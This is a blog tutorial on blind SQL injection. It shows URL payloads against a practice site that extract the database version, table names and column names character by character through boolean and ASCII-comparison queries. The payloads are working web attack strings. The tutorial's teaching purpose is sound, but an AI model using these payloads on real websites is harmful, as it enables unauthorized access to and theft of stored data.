i Blind SQL Injection – All things in moderation

Blind SQL Injection

I. Concept
Blind SQL Injection, of course, is one of techniques used to attack SQL. Blind SQL (Structured Query Language) injection is a type of SQL Injections attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
Attack SQL injection:
1. Finding one website victim.
2. Using (‘) to identify sites with SQL error or not.
3. Get the number of rows and columns through the changes in the URL.
4. Then we can extract data from the database of the web.
However, website has been configured to respond to the attack case, the error will not be returned. So how to know how to attack us is right or wrong? We will use Blind SQL Injection to attack it.

II. How to blind SQL injection attack?
Victim: 
http://testphp.vulnweb.com/listproducts.php?cat=2
1. Identify SQL injection:
The usual way we add in URL a metadata (‘) or (*).
However, has been configured to not return an error, then we would not have been able to detect  SQL error or not.
When the error is not displays, we using logical test. In initial URL, it is true, and website always displays true.

Boolean:
(true and true) = true
(true and false) = false
See the difference between the two following queries:
Ex1: http://testphp.vulnweb.com/listproducts.php?cat=2 and 1=1

blind sql injection

=> Queries true. Website displays like normal.

Ex2: http://testphp.vulnweb.com/listproducts.php?cat=2 and 1=2

blind sql injection

=> Queries failed. Website displays differently.

In conclusion, our code has bees injected to URL that will be processed by DBMS (MySQL by default)
we started to look for other details.

2. FindingVersion:
We can using “substring” to extract a string.
Here we just need to find version MySQL using is 4 or 5? So just take the first number in the name_version of MySQL version used.
We using code: substring(@@version,1,1)

Ex1:http://testphp.vulnweb.com/listproducts.php?cat=2 and substring(@@version,1,1)=4

blind sql injection

=> Queries failed. Website displays differently.

Ex2:http://testphp.vulnweb.com/listproducts.php?cat=2 and substring(@@version,1,1)=5

blind sql injection

=> Right query. Website displays normal.

From the results of two queries we can conclude that the web version using MySQL version 5.

Now, we are continue searching for information on the table, column in DB.
We would expect the table name. Starting from the common name as users, admin, login etc …
Finding table name:
http://testphp.vulnweb.com/listproducts.php?cat=1 and (SELECT 1 from admin)=1

blind sql injection

http://testphp.vulnweb.com/listproducts.php?cat=1 and (SELECT 1 from users)=1

blind sql injection

We can conclude in the database have table name is “users“.
However, to the table name not common we using ASCII extral DB.

3. Finding column name
We have two scenarios here.
– Scenarios 1: Guess the name of the column completely as we have done with table name.
http://testphp.vulnweb.com/listproducts.php?cat=2 and (SELECT substring(concat(1,username),1,1) from users limit 0,1)=1

http://testphp.vulnweb.com/listproducts.php?cat=2 and (SELECT substring(concat(1,uname),1,1) from users limit 0,1)=1 
Nothing wrong happens in our page with colum name is “uname”, we can conclude that the table have colum named ” uname” . Do the same thing with the other column names to retrieve the entire DB column names.
– Scenarios 2: Following this, we can guess each character of the column name
We can guess exactly or their range of ASCII codes.

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))= 117
Here we guess directly with values 117 have to try to guess the names of characters in the column name with ASCII( 65 to 122).
Or we can use ASCII codes directly instead .
http://testphp.vulnweb.com/listproducts.php?cat=2 and substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit,0,1),1,1)=’u’

Alternatively one can use the operators <, > or = for guess column name.
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))> 100
It helps to check this page has the first character of the column name is higher than 100 ( ASCII code ) or not.
And this page shows like usual. So the first character of the column name is higher than 100.
In this query:
– “limit” to limit the query output . Here collective output limit value is 1. Also have a similar query (limit 1).
– “Concat” to connect query.
– information_schema: is default table in mySql that contains DB information.
– table_name = 0x7573657273 mean table_name = “users” ( we found it above  )

Similarly we will query to determine the range of the first character in the column name.
When the distance is short enough and we will try to correct values.
http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),2,1))= 117
Similar to the valuation of the 2nd and then values.

– To determine the length of the name, you can use the query:
www.vuln-web.com/photo.php?id=1′ and (select 1 from dual where database() like ‘_____’)%23 (we started from 5)

In this query: dual is a default table in Oracle database.
with character ( _ ) to determine the length of the name to search.
When the web returns, we could get the expected result. In this situation, we have the length of the name.

References
http://www.securityidiots.com/Web-Pentest/SQL-Injection/Blind-SQL-Injection.html

http://www.kalitutorials.net/2015/02/blind-sql-injection.html

http://resources.infosecinstitute.com/blind-sql-injection

One Response

  1. Stephen Stinson August 3, 2016

Leave a Reply